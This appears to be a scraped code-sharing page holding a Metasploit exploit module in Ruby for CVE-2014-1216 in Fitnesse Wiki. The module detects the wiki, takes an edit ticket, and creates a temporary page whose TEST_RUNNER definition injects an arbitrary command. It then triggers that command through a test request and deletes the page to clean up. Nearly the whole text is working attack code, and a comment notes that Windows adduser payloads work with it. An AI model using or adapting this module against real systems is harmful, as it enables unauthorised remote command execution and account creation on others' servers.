扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Fitnesse Wiki Remote Command Execution', 'Description'=> %q{ This module exploits a vulnerability found in Fitnesse Wiki, version 20140201 and earlier. }, 'Author' => [ 'Jerzy Kramarz',## Vulnerability discovery 'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module ], 'License'=> MSF_LICENSE, 'References' => [ [ 'CVE', '2014-1216' ], [ 'OSVDB', '103907' ], [ 'BID', '65921' ], [ 'URL', 'http://secpod.org/blog/?p=2311' ], [ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ], [ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ] ], 'Privileged' => false, 'Payload'=> { 'Space'=> 1000, 'BadChars' => "", 'DisableNops' => true, 'Compat'=> { 'PayloadType' => 'cmd', ## ##'RequiredCmd'=> 'generic telnet', ## payloads cmd/windows/adduser and cmd/windows/generic works perfectly } }, 'Platform' => %w{ win }, 'Arch' => ARCH_CMD, 'Targets'=> [ ['Windows', { 'Platform' => 'win' } ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Feb 25 2014')) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/']) ], self.class) end def check print_status("#{peer} - Trying to detect Fitnesse Wiki") res = send_request_cgi({ 'method' => 'GET', 'uri'=> normalize_uri(target_uri.path) }) if res && res.code == 200 && res.body.include?(">FitNesse<") print_good("#{peer} - FitNesse Wiki Detected!") return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def http_send_command(command) ## Construct random page in WikiWord format uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7)) res = send_request_cgi({ 'method' => 'GET', 'uri'=> uri + "?edit" }) if !res || res.code != 200 fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!") end print_status("#{peer} - Retrieving edit time and ticket id") ## Get Edit Time and Ticket Id from the response res.body =~ /"editTime" value="((\d)+)"/ edit_time = $1 res.body =~ /"ticketId" value="((-?\d)+)"/ ticket_id = $1 ## Validate we are able to extract Edit Time and Ticket Id if !edit_time or !ticket_id print_error("#{peer} - Failed to get Ticket Id / Edit Time.") return end print_status("#{peer} - Attempting to create '#{uri}'") ## Construct Referer referer = "http://#{rhost}:#{rport}" + uri + "?edit" ## Construct command to be executed page_content = '!define COMMAND_PATTERN {%m} !define TEST_RUNNER {' + command + '}' print_status("#{peer} - Injecting the payload") ## Construct POST request to create page with malicious commands ## inserted in the page res = send_request_cgi( { 'uri' => uri, 'method'=> 'POST', 'headers' => {'Referer' => referer}, 'vars_post' => { 'editTime' => edit_time, 'ticketId' => ticket_id, 'responder' => 'saveData', 'helpText' => '', 'suites' => '', '__EDITOR__1' => 'textarea', 'pageContent' => page_content, 'save' => 'Save', } }) if res && res.code == 303 print_status("#{peer} - Successfully created '#{uri}' with payload") end ## Execute inserted command print_status("#{peer} - Sending exploit request") res = send_request_cgi({ 'method' => 'GET', 'uri'=> uri + "?test" }) if res && res.code == 200 print_status("#{peer} - Successfully sent exploit request") end ## Cleanup by deleting the created page print_status("#{peer} - Execting cleanup routine") referer = "http://#{rhost}:#{rport}" + uri + "?deletePage" res = send_request_cgi( { 'uri' => uri + "?deletePage", 'method'=> 'POST', 'headers' => {'Referer' => referer}, 'vars_post' => { 'confirmed' => 'Yes', } }) end def exploit http_send_command(payload.encoded) end end |
体验盒子
